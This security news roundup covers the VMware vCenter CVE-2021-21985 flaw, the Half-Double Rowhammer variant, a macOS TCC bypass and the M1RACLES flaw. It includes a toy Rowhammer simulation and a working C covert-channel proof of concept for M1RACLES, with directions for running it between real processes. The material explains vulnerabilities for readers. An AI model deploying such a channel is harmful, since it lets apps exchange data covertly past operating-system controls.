New critical security bug in VMware vCenter allows a full takeover

Last week was an unfortunate one for Apple. First came a 0-day in macOS that let attackers secretly capture screenshots of the user's desktop; so much for privacy. Just a few days later, news about M1RACLES followed. What is the hype about? The bug is a consequence of the M1 design and, worse, cannot be patched in software; details are below. In this issue we also describe Half-Double, a new variant of the Rowhammer attack that bypasses the in-DRAM defenses deployed so far. Today's Security Center opens, however, with a new critical bug in VMware vCenter. Exploitation is trivial, which is why the bug scored 9.8/10 on CVSS and why security experts and the vendor itself are pressing for urgent updates of vulnerable systems.

VMware vCenter with critical 9.8/10 severity bug – patch ASAP!

VMware's virtualization management platform, vCenter Server, has a critical-severity bug rated 9.8 out of 10 on CVSS. The company is urging customers to patch it "as soon as possible". Successful exploitation allows an attacker to execute arbitrary commands on the underlying vCenter host and take control of the affected system.

VMware vCenter bug – why such a high CVSS rating?

The vulnerability, tracked as CVE-2021-21985, affects vCenter Server, the platform used to manage VMware's vSphere environments and their ESXi hosts. Specifically, it lies in the Virtual SAN (vSAN) Health Check plugin, which is enabled by default in vCenter Server even when vSAN is not actually in use.

Exploiting the vulnerability is trivial: all an attacker needs is network access to vCenter Server on port 443, with no credentials required. So even if an organization has not exposed vCenter Server externally, an attacker who has already gained a foothold inside the network can exploit the flaw.

Earlier in the week, VMware reported another bug, CVE-2021-21986. This second bug has a medium CVSS rating of 6.5 and stems from an authentication issue in the vCenter Server plugin mechanism.

Patches are available for both flaws, and for those who cannot update immediately VMware has published a workaround that disables the affected plugins. In addition to the patches, VMware has improved plugin authentication in the vCenter Server plugin framework.


Rowhammer problem won’t go away soon – new Half-Double variant proves it

Google researchers have discovered a new variant of this attack against DRAM chips, dubbed "Half-Double", that bypasses the in-DRAM defenses deployed so far.

The Half-Double hammering technique relies on the weak electrical coupling between two memory rows that are not immediately adjacent but one row apart: directing a very large number of accesses at the far row, combined with just a handful of accesses to the row in between, flips bits in a victim row two rows away from the main aggressor.


We described some unusual Rowhammer techniques last month. Rowhammer is a class of DRAM vulnerabilities in which repeated accesses to a memory row (the "aggressor") induce an electrical disturbance large enough to flip bits stored in an adjacent row (the "victim"), which can let untrusted code escape its sandbox and take control of the system.

It works because DRAM cells have been getting smaller and packed closer together, so the charge in one row increasingly leaks into its neighbors.

DRAM manufacturers deployed countermeasures such as Target Row Refresh (TRR) to thwart such attacks, but these mitigations only refresh the two immediate neighbors of a heavily accessed aggressor row, leaving cells two rows away unprotected. That imperfect protection has opened the door to new Rowhammer attacks such as TRRespass, SMASH, and now Half-Double.
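The following is an added illustration, not code from this page or from Google's research: a deliberately simplified C model of row disturbance and TRR in which the coupling strengths, the flip threshold and the TRR trigger count are all invented constants (real DRAM behaves far more messily). It shows the reasoning above: with TRR enabled, classic single-sided hammering never accumulates enough disturbance in the adjacent row because that row keeps being refreshed, while the Half-Double pattern (many activations two rows away plus a handful one row away) accumulates in a row that TRR never refreshes.

```c
#include <stdio.h>
#include <string.h>

#define ROWS           16
#define NEAR_COUPLING  10    /* assumed: disturbance per activation on rows at distance 1 */
#define FAR_COUPLING   1     /* assumed: disturbance per activation on rows at distance 2 */
#define FLIP_THRESHOLD 1000  /* assumed: accumulated disturbance at which a cell flips */
#define TRR_THRESHOLD  50    /* assumed: activations of one row that trigger a TRR refresh */

struct dram {
    long disturbance[ROWS];  /* accumulated disturbance per row since its last refresh */
    int  activations[ROWS];  /* per-row activation count, as a TRR engine would track it */
    int  flipped[ROWS];      /* 1 once a row has crossed FLIP_THRESHOLD */
    int  trr_enabled;
};

static void dram_init(struct dram *d, int trr_enabled)
{
    memset(d, 0, sizeof *d);
    d->trr_enabled = trr_enabled;
}

/* A refresh restores the row's charge, wiping its accumulated disturbance. */
static void refresh(struct dram *d, int row)
{
    if (row >= 0 && row < ROWS)
        d->disturbance[row] = 0;
}

/* One activation of `row`: it disturbs rows at distance 1 strongly and rows at
 * distance 2 weakly. With TRR enabled, the TRR_THRESHOLD-th activation
 * refreshes the two immediate neighbours only; rows two away are the blind
 * spot the Half-Double pattern exploits. */
static void activate(struct dram *d, int row)
{
    static const long coupling[3] = { 0, NEAR_COUPLING, FAR_COUPLING };

    for (int dist = 1; dist <= 2; dist++) {
        for (int side = -1; side <= 1; side += 2) {
            int victim = row + side * dist;
            if (victim < 0 || victim >= ROWS)
                continue;
            d->disturbance[victim] += coupling[dist];
            if (d->disturbance[victim] >= FLIP_THRESHOLD)
                d->flipped[victim] = 1;
        }
    }

    if (d->trr_enabled && ++d->activations[row] >= TRR_THRESHOLD) {
        refresh(d, row - 1);
        refresh(d, row + 1);
        d->activations[row] = 0;
    }
}

/* Classic single-sided Rowhammer: hammer one aggressor row `reps` times and
 * report whether its immediate neighbour flipped. */
static int single_sided_flips_neighbour(int trr_enabled, long reps)
{
    struct dram d;
    const int aggressor = 8;

    dram_init(&d, trr_enabled);
    for (long i = 0; i < reps; i++)
        activate(&d, aggressor);
    return d.flipped[aggressor + 1];
}

/* Half-Double: many activations of the far aggressor (victim + 2) plus a few
 * of the near aggressor (victim + 1), spread evenly through the hammering. */
static int half_double_flips_victim(int trr_enabled, long far_reps, long near_reps)
{
    struct dram d;
    const int victim = 10, near = 9, far = 8;
    long stride = near_reps > 0 ? far_reps / near_reps : 0;

    if (near_reps > 0 && stride < 1)
        stride = 1;
    dram_init(&d, trr_enabled);
    for (long i = 0; i < far_reps; i++) {
        activate(&d, far);
        if (stride > 0 && i % stride == 0)
            activate(&d, near);
    }
    return d.flipped[victim];
}

int main(void)
{
    printf("single-sided, 500 reps, no TRR      : neighbour flipped = %d\n",
           single_sided_flips_neighbour(0, 500));
    printf("single-sided, 500 reps, TRR         : neighbour flipped = %d\n",
           single_sided_flips_neighbour(1, 500));
    printf("Half-Double, 900 far + 0 near, TRR  : victim flipped = %d\n",
           half_double_flips_victim(1, 900, 0));
    printf("Half-Double, 900 far + 20 near, TRR : victim flipped = %d\n",
           half_double_flips_victim(1, 900, 20));
    return 0;
}
```

In this model the adjacent row under single-sided hammering is capped at TRR_THRESHOLD * NEAR_COUPLING disturbance before each refresh, which is what keeps it below the flip threshold; the row at distance two receives only the weak coupling but is never refreshed, so the far hammering plus the twenty near accesses push it over the line. The numbers are illustrative only; the point is the structure of the blind spot, not the values.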

Google says it is currently working with partners to identify possible solutions for Rowhammer exploits.


Hackers used a macOS 0-day to bypass privacy features and take sneaky screenshots

Apple has patched a critical bug in macOS that could be exploited to take screenshots of a user's computer and capture their activity within applications or on video conferences without the user knowing.

Researchers found that the XCSSET spyware was exploiting the vulnerability, tracked as CVE-2021-30713, to take screenshots of the user's desktop without requesting any additional permissions.

The flaw bypasses the Transparency, Consent, and Control (TCC) framework, which governs which resources applications may access, for example granting video-collaboration software access to the webcam and microphone so the user can join virtual meetings. The exploit lets an attacker obtain Full Disk Access, Screen Recording, or other permissions without the user's explicit consent.

The good news is that Apple has already addressed the vulnerability in the latest version of macOS, Big Sur 11.4.


M1RACLES, the unpatchable bug in Apple M1 chips, is an effect of its design

Hector Martin, a software engineer working on Asahi Linux, has discovered a vulnerability (CVE-2021-30747) in Apple's M1 chips, dubbed M1RACLES, that cannot be fixed in software.

The M1RACLES vulnerability allows two apps running on the same device to exchange data through a covert channel at the CPU level, without using memory, sockets, files, or any other normal operating system feature.

The flaw stems from the fact that the Arm system register encoded as s3_5_c15_c10_1 contains two implemented bits that can be read and written at EL0 (Exception Level 0, the application privilege level) from all cores simultaneously. One process writes a value into those two bits and another reads it back, which gives the two a 2-bit-wide channel that no OS mechanism mediates.
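As an added example (not Martin's original proof of concept), here is a minimal C implementation of such a channel. On Apple Silicon it accesses the real register with `mrs`/`msr`; on any other platform a process-local variable stands in for the register so the encoding logic still runs. The clock-plus-data layout of the two bits, and the assumption that bits 0 and 1 are the implemented ones, are this example's own choices.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#if defined(__APPLE__) && defined(__aarch64__)
/* Real register access on Apple Silicon: the low two bits of
 * s3_5_c15_c10_1 are readable and writable from EL0 (assumed: bits 0 and 1). */
static inline uint64_t reg_read(void)
{
    uint64_t v;
    __asm__ volatile("mrs %0, s3_5_c15_c10_1" : "=r"(v));
    return v & 3;
}
static inline void reg_write(uint64_t v)
{
    __asm__ volatile("msr s3_5_c15_c10_1, %0" : : "r"(v & 3));
}
#else
/* Stand-in for other platforms: a process-wide variable with the same 2-bit
 * semantics (an assumption made so the protocol logic runs anywhere). */
static uint64_t fake_register;
static inline uint64_t reg_read(void)        { return fake_register & 3; }
static inline void     reg_write(uint64_t v) { fake_register = v & 3; }
#endif

/* Channel layout (our choice, not dictated by the hardware): bit 1 carries a
 * clock that flips on every transfer, bit 0 carries one data bit. */
#define CLOCK_BIT(v) ((int)(((v) >> 1) & 1))
#define DATA_BIT(v)  ((int)((v) & 1))

/* Sender: flip the clock and publish one data bit. Returns the new clock. */
static int send_bit(int clock, int bit)
{
    int next = clock ^ 1;
    reg_write(((uint64_t)next << 1) | (uint64_t)(bit & 1));
    return next;
}

/* Receiver: spin until the clock differs from the last value seen, then
 * return the data bit that was published with it. */
static int recv_bit(int *clock)
{
    uint64_t v;
    do {
        v = reg_read();
    } while (CLOCK_BIT(v) == *clock);
    *clock = CLOCK_BIT(v);
    return DATA_BIT(v);
}

/* Move `n` bytes through the register one bit at a time, MSB first. Sender
 * and receiver are interleaved here in one process; between two real
 * processes each side would just run its own loop. */
static size_t loopback(const uint8_t *in, size_t n, uint8_t *out)
{
    int tx_clock = 0, rx_clock = 0;

    reg_write(0);                       /* both sides start from clock 0 */
    for (size_t i = 0; i < n; i++) {
        uint8_t byte = 0;
        for (int b = 7; b >= 0; b--) {
            tx_clock = send_bit(tx_clock, (in[i] >> b) & 1);
            byte = (uint8_t)((byte << 1) | recv_bit(&rx_clock));
        }
        out[i] = byte;
    }
    return n;
}

/* Self-check: returns 1 if a constructed message survives the channel. */
static int loopback_selftest(void)
{
    static const uint8_t msg[] = "M1RACLES";   /* constructed sample input */
    uint8_t got[sizeof msg];

    if (loopback(msg, sizeof msg, got) != sizeof msg)
        return 0;
    return memcmp(msg, got, sizeof msg) == 0;
}

int main(void)
{
    printf("loopback over s3_5_c15_c10_1 (or its stand-in): %s\n",
           loopback_selftest() ? "ok" : "FAILED");
    return 0;
}
```

Each transfer carries one payload bit because the second bit is spent on the clock; that is the price of not having any other shared state to synchronise on. To use this between two real processes on an M1, put `send_bit` in one and `recv_bit` in the other. Nothing in the exchange touches memory, files or sockets, which is exactly why the operating system has no hook to observe or block it.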

The issue can only be fixed by redesigning the silicon, but the good news is that the severity of the vulnerability is rather low. The bug could be exploited for cross-app tracking by shady advertising companies, for example, and it only works between apps already installed on the device. Martin reported the issue to Apple, but it is not clear whether the company plans to address it.


Do you have a thirst for knowledge? There are ten more cybersecurity stories below.

1. Newly Discovered Bugs in VSCode Extensions Could Lead to Supply Chain Attacks (The Hacker News)
2. Office 365 bug: Exchange Online, Outlook emails sent to junk folder (Bleeping Computer)
3. BazaLoader Masquerades as Movie-Streaming Service (Threat Post)
4. Zeppelin ransomware comes back to life with updated versions (Bleeping Computer)
5. Bluetooth bugs could allow attackers to impersonate devices (We Live Security)
6. Hackers compromised Japanese government offices via Fujitsu’s ProjectWEB tool (Security Affairs)
7. Google Chrome now lets you run more commands via the address bar (Bleeping Computer)
8. Microsoft warns of current Nobelium phishing campaign impersonating USAID (ZDNet)
9. Secure Search is a Browser Hijacker – How to Remove it (Security Affairs)
10. SolarWinds hackers using NativeZone backdoor against 24 countries (Hack Read)